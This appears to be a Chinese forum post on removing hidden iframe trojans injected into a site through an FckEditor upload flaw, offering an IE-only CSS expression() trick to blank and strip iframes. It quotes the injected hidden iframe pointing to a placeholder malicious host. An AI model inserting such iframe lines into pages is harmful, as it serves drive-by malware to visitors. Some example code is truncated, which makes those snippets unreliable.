解决网站被挂iframe木马的操作方案
3015 点击·0 回帖
![]() | ![]() | |
![]() | 实我们现在说的所谓的网站挂马一般就是在那些可编辑文件下加入一段iframe代码来实现访问指定的HTML网页木马的,然后通过你电脑本身的漏洞攻破你的系统给你下载一个下载者,然后那下载者设定多少时间后开始在指定地点隐藏下载木马并运行。 今天一上服务器2000多个<iframe src="http://XXXXX.xom/cn.htm" width=0height=0></iframe>被注入,我晕!检查了半天,原来是FckEditor编辑器上传漏洞导致。在找资料的同时,发现CSS有一个有趣的属性expression,发现这个东东还有点意思,由此写出来,“以儆效尤”! 引用:“IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和javaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。就是说CSS属性后面可以是一段JavaScript表达式,CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接引用元素自身的属性和方法,也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。”我的理解是:expression后面接js表达式执行相关操作 格式: (1)标记固有的CSS属性名:expression(JS表达式); (2)自定义属性名:expression(JS表达式); 使用JS销毁iframe对象原理:使iframe里的请求地址变成空白页(about:blank),再将iframe对象从DOM(文档对象模型)中移除就可以切断所有iframe里的请求了。 CSS代码:iframe{WuWei:expression(this.src='about:blank',this.outerHTML='');} 解释:outerHTML属性是DOM对象包含自身的HTML代码,而 innerHTML则是DOM对象(不含本身)里面所包含的HTML代码。 例子如下: 如果要使自己的iframe显示在网页里,而别人挂的IFRAME马都不起作用,在CSS里加一个 #okiWuWei{iWuWei:expression() !important} 对应的IFRAME代码为: <iframe id="okiWuWei" src=" </style> 然后在这个页面插入几个IFRAME代码,假设它们是被挂的木马网页。代码如下: <iframe src=""></iframe> 相关文章: 用JavaScript防止网站被挂IFRAME木马的方法 | |
![]() | ![]() |